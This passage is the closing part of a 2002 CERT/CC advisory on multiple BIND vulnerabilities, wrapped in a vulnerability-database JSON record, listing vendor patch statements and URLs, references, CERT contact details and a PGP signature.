Information\r\n\r\n This appendix contains information provided by vendors for this\r\n advisory. As vendors report new information to the CERT/CC, we will\r\n update this section and note the changes in our revision history. If a\r\n particular vendor is not listed below, we have not received their\r\n comments.\r\n\r\n Conectiva\r\n\r\n Conectiva Linux 6.0 is affected by this. Updated packages are\r\n available at our ftp server:\r\n\r\n ftp://atualizacoes.conectiva.com.br/6.0/RPMS/bind-8.2.6-1U60_2cl.i386.rpm\r\n ftp://atualizacoes.conectiva.com.br/6.0/RPMS/bind-chroot-8.2.6-1U60_2cl.i386.rpm\r\n ftp://atualizacoes.conectiva.com.br/6.0/RPMS/bind-devel-8.2.6-1U60_2cl.i386.rpm\r\n ftp://atualizacoes.conectiva.com.br/6.0/RPMS/bind-devel-static-8.2.6-1U60_2cl.i386.rpm\r\n ftp://atualizacoes.conectiva.com.br/6.0/RPMS/bind-doc-8.2.6-1U60_2cl.i386.rpm\r\n ftp://atualizacoes.conectiva.com.br/6.0/RPMS/bind-utils-8.2.6-1U60_2cl.i386.rpm\r\n\r\n An advisory about this vulnerability is pending and should be sent to\r\n our security mailing list and published in our web site during the day\r\n &#40;Nov 14th&#41;.\r\n\r\n FreeBSD\r\n\r\n Please see FreeBSD-SA-02:43.bind.\r\n\r\n Hewlett-Packard Company\r\n\r\n SOURCE: Hewlett-Packard Company Software Security Response team x-ref:\r\n SSRT2408\r\n\r\n At the time of writing this document, Hewlett Packard is currently\r\n investigating the potential impact to HP&#39;s released Operating System\r\n software products. As further information becomes available HP will\r\n provide notice of the availability of any necessary patches through\r\n standard security bulletin announcements and be available from your\r\n normal HP Services support channel.\r\n\r\n MontaVista Software\r\n\r\n MontaVista ships BIND 9, thus is not vulnerable to these advisories.\r\n\r\n Nominum, Inc.\r\n\r\n Nominum &quot;Foundation&quot; Authoritative Name Server &#40;ANS&#41; is not affected\r\n by this vulnerability. Also, Nominum &quot;Foundation&quot; Caching Name Server\r\n &#40;CNS&#41; is not affected by this vulnerability. Nominum&#39;s commercial DNS\r\n server products, which are part of Nominum &quot;Foundation&quot; IP Address\r\n Suite, are not based on BIND and do not contain any BIND code, and so\r\n are not affected by vulnerabilities discovered in any version of BIND.\r\n\r\n Openwall Project\r\n\r\n BIND 4.9.10-OW2 includes the patch provided by ISC and thus has the\r\n two vulnerabilities affecting BIND 4 fixed. Previous versions of BIND\r\n 4.9.x-OW patches, if used properly, significantly reduced the impact\r\n of the &quot;named&quot; vulnerability. The patches are available at their usual\r\n location:\r\n\r\n http://www.openwall.com/bind/\r\n\r\n A patch against BIND 4.9.11 will appear as soon as this version is\r\n officially released, although it will likely be effectively the same\r\n as the currently available 4.9.10-OW2. It hasn&#39;t been fully researched\r\n whether the resolver code in glibc, and in particular on Openwall\r\n GNU/*/Linux, shares any of the newly discovered BIND 4 resolver\r\n library vulnerabilities. Analysis is in progress.\r\n\r\n Red Hat Inc.\r\n\r\n Older releases &#40;6.2, 7.0&#41; of Red Hat Linux shipped with versions of\r\n BIND which may be vulnerable to these issues however a Red Hat\r\n security advisory in July 2002 upgraded all our supported\r\n distributions to BIND 9.2.1 which is not vulnerable to these issues.\r\n\r\n All users who have BIND installed should ensure that they are running\r\n these updated versions of BIND.\r\n\r\n http://rhn.redhat.com/errata/RHSA-2002-133.html Red Hat Linux\r\n http://rhn.redhat.com/errata/RHSA-2002-119.html Advanced Server 2.1\r\n\r\nAppendix B. - References\r\n\r\n 1. &quot;Securing an Internet Name Server&quot; -\r\n http://www.cert.org/archive/pdf/dns.pdf\r\n 2. &quot;Internet Security Systems Security Advisory - Multiple Remote\r\n Vulnerabilities in BIND4 and BIND8&quot; -\r\n http://bvlive01.iss.net/issEn/delivery/xforce/alertdetail.jsp?oid=\r\n 21469\r\n &quot;BIND Vulnerabilities&quot; -\r\n http://www.isc.org/products/BIND/bind-security.html\r\n &quot;RFC2671 - Extension Mechanisms for DNS &#40;EDNS0&#41;&quot; -\r\n ftp://ftp.isi.edu/in-notes/rfc2671.txt\r\n _________________________________________________________________\r\n\r\n Internet Security Systems publicly reported the following issues\r\n VU#852283, VU#229595, and VU#581682.\r\n\r\n We thank ISC for their cooperation.\r\n _________________________________________________________________\r\n\r\n Author: Ian A. Finlay.\r\n ______________________________________________________________________\r\n\r\n This document is available from:\r\n http://www.cert.org/advisories/CA-2002-31.html\r\n ______________________________________________________________________\r\n\r\nCERT/CC Contact Information\r\n\r\n Email: cert@cert.org\r\n Phone: +1 412-268-7090 &#40;24-hour hotline&#41;\r\n Fax: +1 412-268-6989\r\n Postal address:\r\n CERT Coordination Center\r\n Software Engineering Institute\r\n Carnegie Mellon University\r\n Pittsburgh PA 15213-3890\r\n U.S.A.\r\n\r\n CERT/CC personnel answer the hotline 08:00-17:00 EST&#40;GMT-5&#41; /\r\n EDT&#40;GMT-4&#41; Monday through Friday; they are on call for emergencies\r\n during other hours, on U.S. holidays, and on weekends.\r\n\r\n Using encryption\r\n\r\n We strongly urge you to encrypt sensitive information sent by email.\r\n Our public PGP key is available from\r\n http://www.cert.org/CERT_PGP.key\r\n\r\n If you prefer to use DES, please call the CERT hotline for more\r\n information.\r\n\r\n Getting security information\r\n\r\n CERT publications and other security information are available from\r\n our web site\r\n http://www.cert.org/\r\n\r\n To subscribe to the CERT mailing list for advisories and bulletins,\r\n send email to majordomo@cert.org. Please include in the body of your\r\n message\r\n\r\n subscribe cert-advisory\r\n\r\n * &quot;CERT&quot; and &quot;CERT Coordination Center&quot; are registered in the U.S.\r\n Patent and Trademark Office.\r\n ______________________________________________________________________\r\n\r\n NO WARRANTY\r\n Any material furnished by Carnegie Mellon University and the Software\r\n Engineering Institute is furnished on an &quot;as is&quot; basis. Carnegie\r\n Mellon University makes no warranties of any kind, either expressed or\r\n implied as to any matter including, but not limited to, warranty of\r\n fitness for a particular purpose or merchantability, exclusivity or\r\n results obtained from use of the material. Carnegie Mellon University\r\n does not make any warranty of any kind with respect to freedom from\r\n patent, trademark, or copyright infringement.\r\n _________________________________________________________________\r\n\r\n Conditions for use, disclaimers, and sponsorship information\r\n\r\n Copyright 2002 Carnegie Mellon University.\r\n\r\n Revision History\r\n\r\nNovember 14, 2002: Initial release\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: PGP 6.5.8\r\n\r\niQCVAwUBPdNOWWjtSoHZUTs5AQE4mAQAh6sFUqi/31ddeUc249b/oqXuHve7WThj\r\nNAYXdX34QBKg9iwVrxTGzkH/0AAzDdD9JnLXPCwfalb8w46BOm8ejR954kClrvx+\r\nT9FjNS1srRz+/8LMLaZ4orY12SvCXXTRSoS1+Ai+U5Z1FvZrQpZtNBetRVOS7CN8\r\nYobf5hqgXd8=\r\n=YlT7\r\n-----END PGP SIGNATURE-----", "edition": 1, "modified": "2002-11-14T00:00:00", "published": "2002-11-14T00:00:00", "id": "SECURITYVULNS:DOC:3754", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:3754", "title": "CERT Advisory CA-2002-31 Multiple Vulnerabilities in BIND", "type": "securityvulns", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}]}